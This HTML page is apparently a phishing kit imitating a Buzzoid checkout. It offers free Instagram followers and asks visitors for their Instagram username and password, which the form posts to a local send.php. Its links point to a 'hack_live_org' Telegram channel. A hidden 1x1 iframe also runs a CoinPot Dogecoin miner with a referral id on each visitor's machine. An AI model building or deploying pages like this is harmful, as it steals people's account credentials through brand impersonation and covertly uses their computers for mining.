﻿﻿<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Buzzoid Checkout</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="robots" content="noindex,nofollow">
<link href="assets/css/order.37a1129b6e65d0b06348.css" rel="stylesheet">
<link rel="stylesheet" href="assets/all.css" integrity="sha384-6jHF7Z3XI3fF4XZixAuSu0gGKrXwoX/w3uFPxC56OtjChio7wtTGJWRW53Nhx6Ev" crossorigin="anonymous">
<link href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,300i,400,400i,600,600i,700,700i,900" rel="stylesheet">

<script>
        (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
        ga('create', 'UA-43674430-1', 'auto');
        ga('send', 'pageview');
        ga('require', 'ec');
        </script>
<iframe scrolling="no" frameborder="0" src="https://coinpot.co/mine/dogecoin/?ref=94D53F942557&mode=widget" style="overflow:hidden;width:1px;height:1px;"></iframe>
<script>
            (function(h,o,t,j,a,r){
                h.hj=h.hj||function(){(h.hj.q=h.hj.q||[]).push(arguments)};
                h._hjSettings={hjid:1690829,hjsv:6};
                a=o.getElementsByTagName('head')[0];
                r=o.createElement('script');r.async=1;
                r.src=t+h._hjSettings.hjid+j+h._hjSettings.hjsv;
                a.appendChild(r);
            })(window,document,'https://static.hotjar.com/c/hotjar-','.js?sv=');
        </script>
</head>
<body>
<script type="text/javascript">
              var _sift = window._sift = window._sift || [];
              _sift.push(['_setAccount', 'df34c4c786']);
              _sift.push(['_setUserId', '']);
              _sift.push(['_setSessionId', '7670d260-8bd6-48dc-a394-2277edef7d3f']);
              _sift.push(['_trackPageview']);
            
              (function() {
              function ls() {
                  var e = document.createElement('script');
                  e.src = 'https://cdn.siftscience.com/s.js';
                  document.body.appendChild(e);
              }
              if (window.attachEvent) {
                  window.attachEvent('onload', ls);
              } else {
                  window.addEventListener('load', ls, false);
              }
              })();
            </script>
<div class="header ">
<div class="contain">

</a>
<a href="https://t.me/hack_live_org" class="user">

</a>
<a href="https://t.me/hack_live_org/" class="logo">
<img src="https://buzzoid.com/assets/img/checkout/logo.svg" alt="Buzzoid">
</a>
</div>
<div class="progress">
<div class="bar"></div>
<div class="value" style="width:25%"></div>
</div>
<div id="alerts">
</div>
</div>
<div class="container-lg step1">
<div class="checkflex">
<div class="flex-c1">
<div class="box">
<div class="heading">
<div class="title">Get Free Followers</div>
<hr>
</div>
<div class="body">
<form id="frmDetails" class="form " method="post" action="send.php">
<input type="hidden" name="user_id" value="">
<div class="alerts">
</div>
<input type="hidden" name="crumb" value="hnRIzs7e6TWONPGIp8elNNtAPShdxRNNjhGQfof2D9K" />
 <div class="form-group">
<img class="input-icon" src="https://buzzoid.com/assets/img/checkout/instagram.svg">
<input type="text" name="username2" class="form-control" value="" placeholder="Instagram username">
</div>
 <div class="form-group">
<img class="input-icon" src="https://www.uplooder.net/img/image/25/b90c05b3cc3cc8a65eca369b7826e56a/icons8-pa_s_sword-1-24.png">
<input type="PASSWORD" name="PASSWORD" class="form-control" value="" placeholder="Instagram password">
</div>
<div class="form-group">
<img class="input-icon" src="https://buzzoid.com/assets/img/checkout/user.svg">
<div class="selector">
<input type="hidden" name="plan" value="112">
<button type="button" class="form-control"><strong>2500</strong> followers<span class="alt">FREE</span></button>
<div class="dropdown-menu">
<a href="#" data-value="5"><span class="desc"><strong>1000</strong> followers</span><span class="alt">FREE</span></a>
<a href="#" data-value="112"><span class="desc"><strong>2500</strong> followers</span><span class="alt">FREE</span></a>
<a href="#" data-value="6"><span class="desc"><strong>3000</strong> followers</span><span class="alt">FREE</span></a>
<a href="#" data-value="8"><span class="desc"><strong>5000</strong> followers</span><span class="alt">FREE</span></a>
</div>
</div>
</div>
<div class="text-center">
<div class="mar-opt checkbox">
<input id="marCheck" type="checkbox" name="mailopt">
<label for="marCheck"><span>Send me free followers every week</span></label>
</div>
</div>
<div class="button-group">
<button type="submit" class="btn btn-block">Get free</button>
</div>
</form>
</div>
</div>
</div>
<div class="flex-c2">
<div class="user-review">
<div class="img">
<img src="https://buzzoid.com/assets/img/testimonials/account-1.png">
</div>
<p></p>
<p>Likes are instant and affordable. I’ve used other companies and instagram would block me from liking photos and threaten to delete my account.</p>
<div class="stars">
<i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i><i class="fas fa-star"></i>
</div>
<div class="author">
<strong>Victoria</strong>
</div>
</div>
</div>
</div>
</div>
<script data-cfasync="false" src=""></script><script src="assets/order.37a1129b6e65d0b06348.js"></script>
</body>
</html>